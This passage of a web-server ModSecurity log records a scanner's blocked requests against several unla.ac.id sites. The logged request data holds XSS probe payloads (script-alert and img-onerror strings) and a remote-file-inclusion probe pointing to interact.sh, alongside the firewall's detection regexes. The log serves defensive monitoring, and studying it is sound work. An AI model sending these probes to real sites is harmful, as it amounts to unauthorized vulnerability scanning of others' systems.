"PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAoqbWwAAAAj"]
[Tue Aug 29 11:53:50.871707 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAox7LAAAAAN"]
[Tue Aug 29 11:53:50.938513 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAApLWkQAAAAI"]
[Tue Aug 29 11:53:51.048535 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO1538Co-f0AAApPcuIAAAAa"]
[Tue Aug 29 11:53:51.094975 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO1538Co-f0AAApPcuMAAAAa"]
[Tue Aug 29 11:53:51.679888 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAolKa4AAAAe"]
[Tue Aug 29 11:53:51.692983 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/product.php"] [unique_id "ZO1538Co-f0AAApJDUgAAAAY"]
[Tue Aug 29 11:53:51.708351 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAowNtIAAAAH"]
[Tue Aug 29 11:53:51.708440 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAolKa8AAAAe"]
[Tue Aug 29 11:53:51.713394 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAox7LQAAAAN"]
[Tue Aug 29 11:53:51.735406 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApOdbgAAAAL"]
[Tue Aug 29 11:53:52.799741 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApOdbkAAAAL"]
[Tue Aug 29 11:53:52.799858 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAAoqbXEAAAAj"]
[Tue Aug 29 11:53:52.804468 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAAofm@oAAAAX"]
[Tue Aug 29 11:53:52.812920 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAAowNtMAAAAH"]
[Tue Aug 29 11:53:52.887668 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAofm@sAAAAX"]
[Tue Aug 29 11:53:52.888666 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAoqbXIAAAAj"]
[Tue Aug 29 11:53:52.973137 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAAox7LgAAAAN"]
[Tue Aug 29 11:53:52.984165 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAoqbXMAAAAj"]
[Tue Aug 29 11:53:53.008562 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApIdlUAAAAU"]
[Tue Aug 29 11:53:53.061454 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApJDU0AAAAY"]
[Tue Aug 29 11:53:53.076811 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154cCo-f0AAApPcukAAAAa"]
[Tue Aug 29 11:53:53.077875 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO154cCo-f0AAAoGFgoAAAAE"]
[Tue Aug 29 11:53:53.084154 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154cCo-f0AAAoZ6UkAAAAK"]
[Tue Aug 29 11:53:53.084274 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApQ2VAAAAAb"]
[Tue Aug 29 11:53:53.084536 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154cCo-f0AAApHRW4AAAAP"]
[Tue Aug 29 11:53:53.546206 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAolKbMAAAAe"]
